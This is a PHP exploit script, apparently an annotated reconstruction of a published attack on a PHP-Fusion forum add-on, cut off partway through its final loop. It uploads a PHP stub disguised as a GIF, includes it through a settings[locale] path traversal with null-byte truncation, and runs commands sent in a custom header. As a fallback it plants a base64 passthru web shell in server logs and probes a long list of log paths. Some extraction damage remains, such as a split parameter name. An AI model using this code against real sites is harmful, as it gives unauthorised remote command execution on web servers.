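// ============================================================================
// Steps 1 and 2: get a PHP stub onto the target's disk, then include it.
//
// Both steps follow the same pattern:
//   1. POST a multipart form to submit.php with a file part named hauru.gif
//      declared as text/plain. $hauru (built earlier in the script, not in
//      this excerpt) is the file body. The handler stores the file under a
//      predictable path; nothing in the chain requires it to be a real GIF.
//   2. GET infusions/fusion_forum_view/fusion_forum_view.php with
//      settings[locale] pointing at the stored file. With register_globals=On
//      the request parameter overwrites $settings['locale'], which the page
//      uses in an include path; the trailing %00 truncates whatever the page
//      appends after it (null-byte truncation of include paths, fixed in
//      PHP 5.3.4). The command to run travels in the custom "HAURU:" request
//      header; the stub's output is everything after the literal marker
//      "Hauru" in the response.
//
// The POSTs carry a forged fusion_user cookie of the form
// "<user_id>.<md5(password)>", so a registered account is a precondition.
//
// $p (base path), $host, $user_id, $password, $cmd and sendpacket() are
// defined earlier in the script; $html is the response body, presumably
// filled in by sendpacket().
//
// NOTE(review): the published listing was recovered from a PDF that dropped
// blank lines, the "--" runs of the MIME boundary and the ".." of every
// traversal segment, and fused page markers ("Trang N") into code lines.
// The multipart bodies are rebuilt per RFC 2046 from one boundary string
// (each part starts with "--".$boundary, the body ends with
// "--".$boundary."--"); traversal depth follows the published listing.
// ============================================================================
$boundary = '7d6224c08dc';
$crlf     = "\r\n";
$partSep  = '--'.$boundary.$crlf;
$partEnd  = '--'.$boundary.'--'.$crlf;

// ---- Step 1: photo-album submission (submit.php?stype=p) -------------------
// $data is appended to, as in the original listing; anything already in it
// ends up in front of these parts.
$data .= $partSep
      .'Content-Disposition: form-data; name="photo_title"'.$crlf.$crlf
      .'DEVIL TEAM Hackers ;)'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="photo_description"'.$crlf.$crlf
      .'Hauru'.$crlf
      .$partSep
      // File part: image file name, text/plain type, PHP code as content.
      .'Content-Disposition: form-data; name="photo_pic_file"; filename="hauru.gif"'.$crlf
      .'Content-Type: text/plain'.$crlf.$crlf
      .$hauru.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="album_id"'.$crlf.$crlf
      .'1'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="submit_photo"'.$crlf.$crlf
      .'Add Photo'.$crlf
      .$partEnd;

echo "upload Hauru!! (step 1) \n";
$packet  = "POST ".$p."submit.php?stype=p HTTP/1.0\r\n";
$packet .= "Cookie: fusion_user=".$user_id.".".md5($password).";\r\n";
$packet .= "Cookie: fusion_visited=yes;\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacket($packet);
sleep(1);  // fixed grace period before the stored file is requested

echo "Hauru uploaded!! now remote code execution (step1) \n";
// LFI trigger: settings[locale] is a traversal to the stored upload, %00 cuts
// off the suffix the page appends. Depth as in the published listing.
$packet  = "GET ".$p."infusions/fusion_forum_view/fusion_forum_view.php?settings[locale]=../../../../images/photoalbum/submissions/hauru.gif%00 HTTP/1.1\r\n";
$packet .= "HAURU: ".$cmd."\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html, "Hauru")) {
    // The stub echoes the marker right before the command output: print what
    // follows the first marker and stop here.
    $temp = explode("Hauru", $html);
    die($temp[1]);
}

// ---- Step 2: downloads submission (submit.php?stype=f) ---------------------
// Same idea, different form and storage directory. The body is started fresh
// rather than appended to the step-1 body: this form does not need the
// photo-album parts, and a terminated step-1 body would end the multipart
// stream before the file part below is reached.
$data = $partSep
      .'Content-Disposition: form-data; name="plik"; filename="hauru.gif"'.$crlf
      .'Content-Type: text/plain'.$crlf.$crlf
      .$hauru.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="download_title"'.$crlf.$crlf
      .'DEVIL TEAM'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="download_description"'.$crlf.$crlf
      .'http://www.rahim.webd.pl/'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="download_category"'.$crlf.$crlf
      .'1'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="download_license"'.$crlf.$crlf
      .'Kacper'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="download_adres"'.$crlf.$crlf
      .'http://www.rahim.webd.pl/'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="download_os"'.$crlf.$crlf
      .'h4cking'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="download_version"'.$crlf.$crlf
      .'666'.$crlf
      .$partSep
      .'Content-Disposition: form-data; name="upload"'.$crlf.$crlf
      .'Send File'.$crlf
      .$partEnd;

echo "upload Hauru!! (step 2) \n";
$packet  = "POST ".$p."submit.php?stype=f HTTP/1.0\r\n";
$packet .= "Cookie: fusion_user=".$user_id.".".md5($password).";\r\n";
$packet .= "Cookie: fusion_visited=yes;\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data;
sendpacket($packet);
sleep(1);  // fixed grace period before the stored file is requested

echo "Hauru uploaded!! now remote code execution (step2) \n";
// Same LFI trigger, aimed at the downloads directory.
$packet  = "GET ".$p."infusions/fusion_forum_view/fusion_forum_view.php?settings[locale]=../../../../downloads/hauru.gif%00 HTTP/1.1\r\n";
$packet .= "HAURU: ".$cmd."\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html, "Hauru")) {
    $temp = explode("Hauru", $html);
    die($temp[1]);
}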
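echo "insert evil code in logfiles (step3 - last) \r\n\r\n";
// Step 3 fallback payload: a PHP stub that, once a poisoned web-server log is
// included through the same settings[locale] LFI, runs the command carried in
// the "HAURU:" request header. Decoded, the base64 below is (banner echoes
// elided):
//   <?php ob_clean(); ... ini_set("max_execution_time",0);
//   echo "Hauru"; passthru($_SERVER[HTTP_HAURU]); die;  (then the closing tag)
// The echo of "Hauru" is the marker the response parsing looks for.
// The chunks are kept exactly as published, including the stray whitespace
// left by extraction (base64_decode() in non-strict mode skips it); the
// listing had lost the "." concatenation operators between the chunks, which
// made it a parse error.
$calcifer = base64_decode(
    "PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFt ZWsgSGF1cnUgOy0pZWNobyIuL".
    "i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwu VEVBTS".
    "4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi4 HbyB".
    "UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRl YW0iO2Vj".
    "aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYm QucGwvI".
    "jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1Ijt wYX".
    "NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+"
);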
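// Plant the stub in the web-server logs: it is sent both as the request path
// (so it lands in the access log) and as the User-Agent. Neither copy is
// URL-encoded, so the request line is malformed; only the logged text matters
// here, and presumably the failed request also leaves a copy in the error log.
// A poisoned log is then included through the settings[locale] LFI by the
// path-probing loop that follows.
$packet  = "GET ".$p.$calcifer." HTTP/1.0\r\n";
$packet .= "User-Agent: ".$calcifer." Googlebot/2.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: close\r\n\r\n";
sendpacket($packet);
sleep(1);  // let the server flush the log line before probing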
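// Candidate locations of Apache access/error logs, probed in this order by the
// loop that follows (the request builder prefixes each with a further
// "../../../../"). The ".." of every traversal segment was lost in the PDF
// extraction and is restored here; depth follows the published listing.
// Over-traversing past "/" is harmless on Unix, which is why the deeper
// variants are simply tried as well. ".../var/log/access_log" appears twice
// (entries 33 and 40), as in the original.
$paths = array(
    "../../../../../var/log/httpd/access_log",
    "../../../../../var/log/httpd/error_log",
    "../apache/logs/error.log",
    "../apache/logs/access.log",
    "../../apache/logs/error.log",
    "../../apache/logs/access.log",
    "../../../apache/logs/error.log",
    "../../../apache/logs/access.log",
    "../../../../apache/logs/error.log",
    "../../../../apache/logs/access.log",
    "../../../../../apache/logs/error.log",
    "../../../../../apache/logs/access.log",
    "../logs/error.log",
    "../logs/access.log",
    "../../logs/error.log",
    "../../logs/access.log",
    "../../../logs/error.log",
    "../../../logs/access.log",
    "../../../../logs/error.log",
    "../../../../logs/access.log",
    "../../../../../logs/error.log",
    "../../../../../logs/access.log",
    "../../../../../etc/httpd/logs/access_log",
    "../../../../../etc/httpd/logs/access.log",
    "../../../../../etc/httpd/logs/error_log",
    "../../../../../etc/httpd/logs/error.log",
    "../../../../../var/www/logs/access_log",
    "../../../../../var/www/logs/access.log",
    "../../../../../usr/local/apache/logs/access_log",
    "../../../../../usr/local/apache/logs/access.log",
    "../../../../../var/log/apache/access_log",
    "../../../../../var/log/apache/access.log",
    "../../../../../var/log/access_log",
    "../../../../../var/www/logs/error_log",
    "../../../../../var/www/logs/error.log",
    "../../../../../usr/local/apache/logs/error_log",
    "../../../../../usr/local/apache/logs/error.log",
    "../../../../../var/log/apache/error_log",
    "../../../../../var/log/apache/error.log",
    "../../../../../var/log/access_log",
    "../../../../../var/log/error_log"
);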
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "if register_globals = On\r\n";
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution in logifiles wait \n";
$packet ="GET ".$p."infusions/fusion_forum_view/fusion_forum_view.php?settin gs[locale]= / / / /".$paths[$i]."%00 HTTP/1.1\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";